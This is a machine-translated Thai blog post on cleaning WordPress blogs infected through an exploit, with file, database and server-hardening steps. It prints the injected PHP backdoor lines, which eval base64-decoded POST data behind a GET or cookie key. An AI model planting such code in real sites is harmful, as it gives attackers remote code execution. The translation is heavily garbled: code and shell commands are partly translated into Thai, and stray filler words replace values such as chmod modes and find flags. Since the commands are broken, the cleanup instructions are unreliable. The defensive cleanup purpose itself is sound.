WordPress Exploit - ไวรัสไฟล์ทำความสะอาดและการรักษาความปลอดภัยเซิร์ฟเวอร์ SQL

ก่อนที่คุณจะอ่านบทความนี้คุณจะเห็น , เพื่อให้เข้าใจสิ่งที่ :)

เราพบว่าหลายบล็อกที่ stealthsettings.com ไฟล์คล้ายกับรหัสที่ด้านล่างที่เกิดจากการ virusarii กับ ใช้ประโยชน์จาก WordPress.:

<? Php if ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {EVAL (base64_decode ($ _ POST [ 'แฟ้ม'])); ทางออก; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcถ้าข้างต้นเป็นเรื่องเกี่ยวกับไฟล์ xmlrpc.php จาก ง่วงนอน, ที่ grep เซิร์ฟเวอร์ดูเหมือนค่อนข้างมากชนิดนี้ในรหัสแหล่งที่มา

pppffiuuu

ทำความสะอาดไฟล์ที่ติดเชื้อ:

Ooookkkk ...
ฮิต ทางออกที่ดีที่สุดเท่าที่มันจะทำ การสำรองข้อมูลและทำความสะอาดฐานข้อมูลคือการ เอาออก ไฟล์ WordPress (Wp-config.php สามารถเก็บไฟล์ที่ไม่เกี่ยวข้องอย่างเคร่งครัดเพื่อแพลตฟอร์มไฟล์ wp หลังจากตรวจสอบอย่างรอบคอบ) บนเซิร์ฟเวอร์และทำให้การอัปโหลดรุ่นเดิม 2.5.1 (ในโอกาสนี้และทำให้ไฟล์ wp ปรับรุ่น :)) http://wordpress.org/download/ . เช็ดรวมถึงไฟล์รูปแบบถ้าคุณไม่เชื่อว่าคุณสามารถตรวจสอบพวกเขาอย่างระมัดระวัง

มันดูเหมือนว่าจะได้รับผลกระทบและไฟล์ในรูปแบบที่ไม่ได้ถูกนำมาใช้ก่อนในบล็อกและเพียงแค่เปลี่ยนรูปแบบที่ไม่สามารถแก้ปัญหานี้

./andreea/wp-content/themes/default/index.php:<?php ถ้า ($ _ คุกกี้ ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {EVAL (base64_decode ($ _ POST [' แฟ้ม '])); ออก; ?}> <Php get_header (); ?>

ฮิต ค้นหาและลบไฟล์ทั้งหมดที่มี... * _new.php * _old.php * Jpgg * Giff * Pngg และไฟล์ WP-info.txt ถ้ามี

หา -ชื่อ "* _new.php"
หา -ชื่อ "* _old.php"
หา -ชื่อ "* Jpgg."
หา -ชื่อ "* _giff"
หา -ชื่อ "* _pngg"
หา -ชื่อ "WP-info.txt"

ฮิต ใน / Tmp , ค้นหาและลบโฟลเดอร์เช่น tmpYwbzT2

การทำความสะอาด SQL :

ฮิต ในตารางตาราง wp_options ตรวจสอบและลบเส้น: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

ฮิต ใน wp_options ไปที่ active_plugins และลบถ้ามีปลั๊กอินที่จะสิ้นสุดลงในหนึ่งของนามสกุล * _new.php * _old.php *. jpgg * pngg. Giff *. หรือถ้านามสกุลอื่นเป็นผู้ต้องสงสัยให้ตรวจสอบอย่างรอบคอบ

ฮิต ตาราง wp_users, ดูว่ามีผู้ใช้ที่ยังไม่ได้เขียนอะไรในสิทธิของคอลัมน์ของเขา user_nicename. ลบผู้ใช้รายนี้ แต่โปรดทราบหมายเลขในคอลัมน์ ID ผู้ใช้รายนี้มีแนวโน้มที่จะใช้ "WordPress" เป็น user_login และมีมันถูกสร้างขึ้นบนฮิต: ฮิต: ฮิตฮิตฮิต--ฮิต

ฮิต ไปที่ตาราง wp_usermeta และลบทุกเส้นที่เป็น ID ดังกล่าวข้างต้น

หลังจากที่คุณได้กระทำการทำความสะอาดสั่งนี้ปิดใช้งานแล้วเปิดใช้งานปลั๊กอินบาง (ในบล็อก -> กระดาน -> ปลั๊กอิน)

เซิร์ฟเวอร์ที่ปลอดภัย:

ฮิต ดูสิ่งที่ไดเรกทอรีและไฟล์ "สามารถเขียนได้"(Chmod ฮิต) และพยายามที่จะนำพวกเขา chmod ที่จะไม่อนุญาตให้มีการเขียนของพวกเขาในระดับใด (ฮิต chmod เช่น)

หา -Perm-ฮิตคำสั่ง ls-

ฮิต ดูว่าไฟล์ถูกตั้งบิต suid หรือ sgid . หากคุณไม่ได้ใช้ไฟล์เหล่านั้นวางอยู่บนพวกเขา chmod ฮิต หรือถอนการติดตั้งแพคเกจที่มี พวกเขาจะมีอันตรายมากเพราะพวกเขาดำเนินการสิทธิ "กลุ่ม"หรือ"ราก"และไม่ได้อยู่กับสิทธิ์ของผู้ใช้ปกติท​​ี่จะเรียกใช้ไฟล์ที่

หา / ประเภท F-ดัด-ฮิตคำสั่ง ls-
หา / ประเภท F-ดัด-ฮิตคำสั่ง ls-

ฮิต ตรวจสอบสิ่งที่พอร์ตที่เปิดและพยายามที่จะปิดหรือความปลอดภัยของคนที่ไม่ได้ใช้

netstat-| grep-i ฟัง

มาก ฉันเห็น Google Search และคนอื่น ๆ บอกว่า "ดีที่คุณได้ !!!" ดีดีที่ฉันได้ทำมัน ... แต่คุณทราบว่า Google จะเริ่มต้นที่จะห้าม เว็บไซต์ทั้งหมด การขึ้นรูป SE SPAM และใส่โทรจัน (Trojan.Clicker.HTML) ในคุกกี้หรือไม่

WordPress Exploit - ไวรัสไฟล์ทำความสะอาดและการรักษาความปลอดภัยเซิร์ฟเวอร์ SQL

เกี่ยวกับผู้เขียน

ชิงทรัพย์

หลงใหลเกี่ยวกับทุกอย่างที่แกดเจ็ตและไอทีเขียนยินดี stealthsettings.com ของ 2006 และผมชอบที่จะค้นพบสิ่งใหม่ ๆ กับคุณเกี่ยวกับคอมพิวเตอร์และ MacOS, Linux, Windows, iOS และ Android

1 แสดงความคิดเห็น

แสดงความคิดเห็น

ไซต์นี้ใช้ Akismet เพื่อลดสแปม เรียนรู้วิธีการประมวลผลข้อมูลความคิดเห็นของคุณ.